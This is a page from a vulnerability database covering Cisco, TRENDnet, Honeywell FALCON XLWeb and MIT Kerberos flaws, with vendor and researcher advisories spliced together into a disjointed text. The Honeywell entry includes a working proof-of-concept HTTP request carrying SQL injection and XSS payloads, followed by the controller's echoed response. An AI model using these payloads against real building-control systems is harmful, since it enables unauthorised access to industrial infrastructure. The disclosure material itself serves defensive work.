VARIoT IoT vulnerabilities database
| VAR-201407-0385 | CVE-2014-3322 | Cisco ASR 9000 Run on device Cisco IOS XR Service disruption in (DoS) Vulnerabilities |
CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 4.3(.2) and earlier on ASR 9000 devices does not properly perform NetFlow sampling of IP packets, which allows remote attackers to cause a denial of service (chip and card hangs) via malformed (1) IPv4 or (2) IPv6 packets, aka Bug ID CSCuo68417. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture.
Attackers can exploit this issue to cause the NP chip and a line card on an affected device to lock up and reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuo68417. The vulnerability is caused by the fact that the program does not perform sampling of NetFlow IP packets
| VAR-201407-0750 | No CVE | TRENDnet TEW-732BR has an unknown vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
TRENDnet TEW-732BR is a routing device. There are unexplained vulnerabilities in TRENDnet TEW-732BR, and no detailed vulnerability details are available.
| VAR-201407-0540 | CVE-2014-2717 | Honeywell FALCON XLWeb Controllers Authentication Bypass Vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to bypass authentication and obtain administrative access by visiting the change-password page. Supplementary information : CWE Vulnerability type by CWE-552: Files or Directories Accessible to External Parties ( Externally accessible file or directory ) Has been identified. http://cwe.mitre.org/data/definitions/552.htmlIf a third party accesses the password change page, authentication may be bypassed and administrative access may be obtained. Honeywell is a manufacturing company focused on automation control. An attacker could exploit this vulnerability to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Vulnerabilities
---------------
CVSS 10 - INSECURE CREDENTIAL STORAGE (Pass the Hash) CVE-2015-7914
CVSS 10 - INSECURE TRANSMISSION OF CREDENTIALS CVE-2015-7915
CVSS 7.4 - CROSS-SITE SCRIPTING CVE-2015-7916
Other risk exposures
---------------
Undocumented default accounts
Note that default accounts with changeable passwords, even when those
are undocumented and do not look as user accounts neither in interface
or documentation, constitute a formal vulnerability. It is at worst a
misconfiguration.
References (Source)
---------------
This advisory:
https://www.outpost24.com/critical-scada-vulnerabilities-sauter-moduweb/
ICS CERT:
https://ics-cert.us-cert.gov/advisories/ICSA-16-033-01
Summary of the issues
---------------
In short \x96 By obtaining access to a system using undocumented accounts,
it is possible to obtain a low privilege level.
By exploiting the fact that the cashed credentials used for the
\x93remember me\x94 function of the web application employ the same encryption
as the one used for protection of passwords included in backups, a user
can elevate privileges to administrator level.
The backups also contain other encrypted configuration information which
can further an attacker\x92s access to also affect for example email
accounts used for notifications.
By accessing the system as an administrator, an attacker can obtain
those credentials in plain text from the system as they are included in
the configuration details, protected only by the use of \x93password\x94
field-types in the forms.
In essence this constitute a pass the hash vulnerability. Just as with
https://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/
which used hashed inputs to generate secure transfer of credentials over
non encrypted connections, applying the same protection scheme to its
stored, and exposed, secrets.
Don\x92t do your own cryptography.
A bit more details, sufficient for the interested reader to recreate but
not a straight forward guide, available at the provided references.
Martin Jartelius \x96 CSO \x96 Outpost24
John Stock \x96 Technology Program Director \x96 Outpost24
. After giving the market two extra months for patching and also
contacting some of the affected national CERTs Outpost24 today released
the vulnerability details for CVE-2014-2717.
This vulnerability consists of a missing access restriction in
combination with a flawed login function, resulting in something as
exotic as a pass the hash vulnerability to authenticate with a SCADA
system, giving administrative access.*
*TL;DR; The Honeywell Falcon (XLWeb Linux/Webserver) contains a
vulnerability which allows anyone, even without knowing the username or
password, to log in as an administrator in the system. Although
information regarding the presence of the vulnerability has been
available for a few months since its open disclosure by the ISC CERT to
member organizations, there are multiple unpatched systems that remain
exposed to the Internet. Outpost24 have waited for an airport we were
aware of were affected to patch before releasing.
The more full information is available here;
http://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/
References:
https://ics-cert.us-cert.gov/advisories/ICSA-14-175-01
CVE-2014-2717
AFFECTED PRODUCTS
The following Honeywell FALCON XLWeb controller versions are affected:
* FALCON Linux 2.04.01 or older
* FALCON XLWebExe 2.02.11 or older.
The impact to individual organizations depends on many factors that are
unique to each organization. ICS-CERT recommends that organizations
evaluate the impact of this vulnerability based on their operational
environment, architecture and product implementation.
The affected products, FALCON XLWeb controllers, are web-based SCADA
systems. According to Honeywell, FALCON XLWeb controllers are deployed
across several industries including critical manufacturing, energy and
wastewater systems among others. According to Honeywell, the affected
controllers are used by customers primarily in Europe and the Middle East.
Outpost24 would like to direct a thank you to Honeywell and ICS CERT for
their fast work in resolving the problems, and we also completely share
the vendors recommendation that SCADA systems already in the first place
should not be internet facing. The vendor have been a pleasure to work
with and have taken every care to resolve the issue timely.
Martin Jartelius
CSO
Outpost24
www.outpost24.com
| VAR-201407-0468 | CVE-2014-3110 | Honeywell FALCON XLWeb Linux Controller and FALCON XLWeb XLWebExe Controller cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities on Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to inject arbitrary web script or HTML via invalid input. Honeywell is a manufacturing company focused on automation control.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. # Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110
--------------- ---> Proof Of Concept <--------------------------
POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT
<br />
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="expires" content="0"/>
<link rel="stylesheet" href="include/honeywell.css"/>
<title><br />
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>
<script language="JavaScript">
<!--
var NS4 = document.layers;
// if the selected element has alarms, the element within the
// drop Down-list should be styled red.
// This is done for firefox which does not accept even the
// usage of inline styles.
function setOptionColor() {
if(document.getElementById("LoginSelect") != null) {
var selectionBox = document.getElementById("LoginSelect");
var selectedElement = selectionBox.selectedIndex;
var selectedOption = selectionBox.options[selectedElement];
if(selectedOption.getAttribute("class") != null) {
var className = selectedOption.getAttribute("class");
if(className == "red") {
selectionBox.style.color = "#FF0000";
}
}
}
}
function onSessionChange (sSessionID, sLocaleID)
{
document.forms.main.elements["SessionID"].value = sSessionID;
document.forms.main.elements["LocaleID"].value = sLocaleID;
submitCommand ("ChangeSession");
}
function onDeviceListChange ()
{
submitCommand ("UpdateDeviceList");
}
function onSessionCreated (sResult, sSessionID)
{
if (sResult != "4194561")
{
if (sResult == "196626")
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>346</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: TooManyUsers in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>348</b><br />*
*");*
}
else
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>352</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: OperationalProblem in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>354</b><br />*
*");*
}
return;
}
var sUserName = document.forms.main.elements["LoginUserName"].value;
var sPassword = calcMD5 (document.forms.main.elements[
"LoginPassword"].value);
sPassword = calcMD5 (sSessionID + sUserName + sPassword);
sUserName = calcMD5 (sUserName);
document.forms.main.elements["LoginSessionID"].value = sSessionID;
document.forms.main.elements["LoginUserNameMD5"].value = sUserName;
document.forms.main.elements["LoginPasswordMD5"].value = sPassword;
submitCommand ("Login");
}
function showHelp (sHelpID)
{
var lWidth = 360;
var lHeight = 320;
var lLeft = (screen.width - lWidth) / 2;
var lTop = (screen.height - lHeight) / 2;
openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*
&ID=" + sHelpID,
"Help",
"width=" + lWidth + ",height=" + lHeight + ",left=" +
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");
}
function submitCommand (sCommand)
{
//document.forms.main.elements["LoginPassword"].value = "";
document.forms.main.elements["LoginCommand"].value = sCommand;
document.forms.main.submit ();
}
function checkEnter (event)
{
var lkeyCode = 0;
if (NS4)
{
lkeyCode = event.which;
}
else
{
lkeyCode = event.keyCode;
}
if (lkeyCode == 13)
{
createSession ();
}
}
function changeDevice ()
{
var oOptions = document.forms.main.elements["
LoginDevice"].options;
for (var lIndex = 0; lIndex < oOptions.length; lIndex++)
{
if (oOptions[lIndex].selected)
{
var sURL = "http://" + oOptions[lIndex].value;
sURL += ":80";
sURL += "/standard/";
sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>
";
parent.parent.window.location.replace (sURL);
return;
}
}
}
function createSession ()
{
if (top.frames.updateframe &&
top.frames.updateframe.createSession)
{
top.frames.updateframe.createSession ();
}
else
{
var lLeft = screen.width;
var lTop = screen.height;
var oWindow = open ("login/session.php",
"Session",
"width=0,height=0,left=" + lLeft + ",top=" +
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");
}
}
function onLoad ()
{
if (top.frames.updateframe)
{
top.frames.updateframe.location.replace ("login/update.php");
}
document.main.LoginUserName.focus ();
}
//-->
</script>
<script type="text/javascript" src="scripts/md5.js"></script>
</head>
<body onload="setOptionColor()" class="colored" onLoad="onLoad ();"
style="background-image: url(images/bg_headline_dialog.gif);
background-repeat:repeat-x;">
<form name="main" method="post" action="/standard/mainframe.php">
<input type="hidden" name="SessionID"/>
<input type="hidden" name="LocaleID" value="'"--></
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>
<input type="hidden" name="rememberMeCheck" value=""/>
<input type="hidden" name="LoginSessionID"/>
<input type="hidden" name="LoginUserNameMD5"/>
<input type="hidden" name="LoginPasswordMD5"/>
<input type="hidden" name="LoginCommand"/>
<!-- *******************************************************************
-->
<!-- * Controller Name
* -->
<!-- *******************************************************************
-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#7F7F7F"><img alt=""
src="images/blank.gif" width="1" height="1"/></td></tr>
<tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"
width="1" height="1"/></td></tr>
<tr>
<td class="headline" height="16" nowrap="">
AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />
<b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>509</b><br />
</td>
</tr>
</table>
<table width="100%" height="75%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td width="50%"> </td>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<!-- ******************************
************************************* -->
<!-- * Custom image
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td align="center">
<img alt="" src="login/loginlogo.gif"
/>
</td>
</tr>
<tr><td><img alt="" src="images/blank.gif" width="1"
height="7"/></td></tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Login group
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>596</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>597</b><br />
<table width="100%" border="0" cellspacing="0" cellpadding="0"
bgcolor="#B8D7F0">
<tr>
<td><img alt="" src="images/group_left_top.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_top.gif"
width="5" height="5"/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
<td width="100%" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td colspan="2" class="groupheader" nowrap="">
<b></b>
</td>
<td align="right">
</td>
</tr>
<tr>
<td> </td>
<td width="100%">
<table border="0" cellpadding="1" cellspacing="1">
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>605</b><br />
: </td>
<td>
<select id="LoginSelect" class="loginSelect"
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">
<option
selected="" value="192.168.1.12"
class="red" style="color:#FF0000;
background-color:#D8E8F8">
XLWEB_MUSEO_LANA
</option>
</select>
</td>
<td> </td>
<td align="right">
<img alt="" name="LoginAlarm"
src="footer/alarm_red_tr.gif"> </td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>632</b><br />
: </td>
<td>
<select name="LoginUserName" style="width:150px;">
<br />
<b>Warning</b>: Invalid argument supplied for foreach() in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>650</b><br />
</select>
</td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>689</b><br />
: </td>
<td>
<!--<input type="password" class="text" name="LoginPassword"
style="width:150px;" onKeyPress="checkEnter (event)"/>-->
<input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"
size="25" class="ppinput" value=""/>
</td>
</tr>
<tr>
<td><br />
<b>Notice</b>: Undefined index: RememberMeCheckbox in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>720</b><br />
</td>
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"
/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="90"
height="2"/></td>
<td><img alt="" src="images/blank.gif" width="1"
height="2"/></td>
</tr>
</table>
</td>
<td> </td>
</tr>
</table>
</td>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
</tr>
<tr>
<td><img alt="" src="images/group_left_bottom.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_bottom.gif"
width="5" height="5"/></td>
</tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Button
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>750</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>751</b><br />
<table border="0" cellspacing="0" cellpadding="0" >
<tr>
<td><img alt="" src="images/buttonleft.gif" width="7"
height="18"/></td>
<td background="images/buttonmiddle.gif" nowrap=""><a
class="button" href="JavaScript:createSession ();" title=""></a></td>
<td><img alt="" src="images/buttonright.gif" width="7"
height="18"/></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="50%"> </td>
</tr>
</table>
</form>
</body>
</html>
| VAR-201408-0299 | CVE-2014-4344 | MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Asceptor's acc_ctx_cont Service disruption in functions (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The acc_ctx_cont function in the SPNEGO acceptor in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.5.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty continuation token at a certain point during a SPNEGO negotiation. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions.
Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
For the stable distribution (wheezy), these problems have been fixed in
version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 1.12.1+dfsg-7. ==========================================================================
Ubuntu Security Notice USN-2310-1
August 11, 2014
krb5 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu
12.04 LTS. This
issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected
Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
(CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon
incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
krb5-admin-server 1.12+dfsg-2ubuntu4.2
krb5-kdc 1.12+dfsg-2ubuntu4.2
krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2
krb5-otp 1.12+dfsg-2ubuntu4.2
krb5-pkinit 1.12+dfsg-2ubuntu4.2
krb5-user 1.12+dfsg-2ubuntu4.2
libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2
libgssrpc4 1.12+dfsg-2ubuntu4.2
libk5crypto3 1.12+dfsg-2ubuntu4.2
libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2
libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2
libkdb5-7 1.12+dfsg-2ubuntu4.2
libkrad0 1.12+dfsg-2ubuntu4.2
libkrb5-3 1.12+dfsg-2ubuntu4.2
libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS:
krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5
krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5
krb5-user 1.10+dfsg~beta1-2ubuntu0.5
libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5
libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5
libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5
libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5
libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5
libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS:
krb5-admin-server 1.8.1+dfsg-2ubuntu0.13
krb5-kdc 1.8.1+dfsg-2ubuntu0.13
krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13
krb5-pkinit 1.8.1+dfsg-2ubuntu0.13
krb5-user 1.8.1+dfsg-2ubuntu0.13
libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13
libgssrpc4 1.8.1+dfsg-2ubuntu0.13
libk5crypto3 1.8.1+dfsg-2ubuntu0.13
libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13
libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13
libkdb5-4 1.8.1+dfsg-2ubuntu0.13
libkrb5-3 1.8.1+dfsg-2ubuntu0.13
libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes. The verification
of md5 checksums and GPG signatures is performed automatically for you. (CVE-2014-4341)
This update also fixes the following bugs:
* Prior to this update, the libkrb5 library occasionally attempted to free
already freed memory when encrypting credentials. As a consequence, the
calling process terminated unexpectedly with a segmentation fault.
With this update, libkrb5 frees memory correctly, which allows the
credentials to be encrypted appropriately and thus prevents the mentioned
crash. (BZ#1004632)
* Previously, when the krb5 client library was waiting for a response from
a server, the timeout variable in certain cases became a negative number.
Consequently, the client could enter a loop while checking for responses.
With this update, the client logic has been modified and the described
error no longer occurs. After installing the
updated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update
Advisory ID: RHSA-2015:0439-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html
Issue date: 2015-03-05
CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343
CVE-2014-4344 CVE-2014-4345 CVE-2014-5352
CVE-2014-5353 CVE-2014-9421 CVE-2014-9422
CVE-2014-9423
=====================================================================
1. Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Kerberos is a networked authentication system which allows clients and
servers to authenticate to each other with the help of a trusted third
party, the Kerberos KDC.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. A remote, unauthenticated attacker could
use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind)
when it was used with an LDAP back end for the KDC database. A remote,
authenticated attacker could potentially use this flaw to execute arbitrary
code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5
library processed valid context deletion tokens. An attacker able to make
an application using the GSS-API library (libgssapi) call the
gss_process_context_token() function could use this flaw to crash that
application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote,
authenticated attacker with the permissions to set the password policy
could crash kadmind by attempting to use a named ticket policy object as a
password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid
External Data Representation (XDR) data. An authenticated user could use
this flaw to crash the MIT Kerberos administration server (kadmind), or
other applications using Kerberos libraries, using specially crafted XDR
packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind)
incorrectly accepted certain authentication requests for two-component
server principal names. A remote attacker able to acquire a key with a
particularly named principal (such as "kad/x") could use this flaw to
impersonate any user to kadmind, and perform administrative actions as that
user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS
implementation (libgssrpc) handled certain requests. An attacker could send
a specially crafted request to an application using libgssrpc to disclose a
limited portion of uninitialized memory used by that application.
(CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled
certain requests. A remote, unauthenticated attacker able to inject packets
into a client or server application's GSSAPI session could use either of
these flaws to crash the application. An
attacker able to spoof packets to appear as though they are from an GSSAPI
acceptor could use this flaw to crash a client application that uses MIT
Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the
CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT
Kerberos project acknowledges Nico Williams for helping with the analysis
of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which
provides a number of bug fixes and enhancements, including:
* Added plug-in interfaces for principal-to-username mapping and verifying
authorization to user accounts.
* When communicating with a KDC over a connected TCP or HTTPS socket, the
client gives the KDC more time to reply before it transmits the request to
another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
* The Kerberos client library did not recognize certain exit statuses that
the resolver libraries could return when looking up the addresses of
servers configured in the /etc/krb5.conf file or locating Kerberos servers
using DNS service location. The library could treat non-fatal return codes
as fatal errors. Now, the library interprets the specific return codes
correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
* Added support for contacting KDCs and kpasswd servers through HTTPS
proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
4. Solution:
All krb5 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf
1102837 - Please backport improved GSSAPI mech configuration
1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly
1109919 - Backport https support into libkrb5
1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext
1118347 - ksu non-functional, gets invalid argument copying cred cache
1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens
1121789 - CVE-2014-4343: use-after-free crash in SPNEGO
1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators
1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens
1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure
1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)
1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update
1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name
1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)
1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)
1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)
1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)
1184629 - kinit loops on principals on unknown error
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
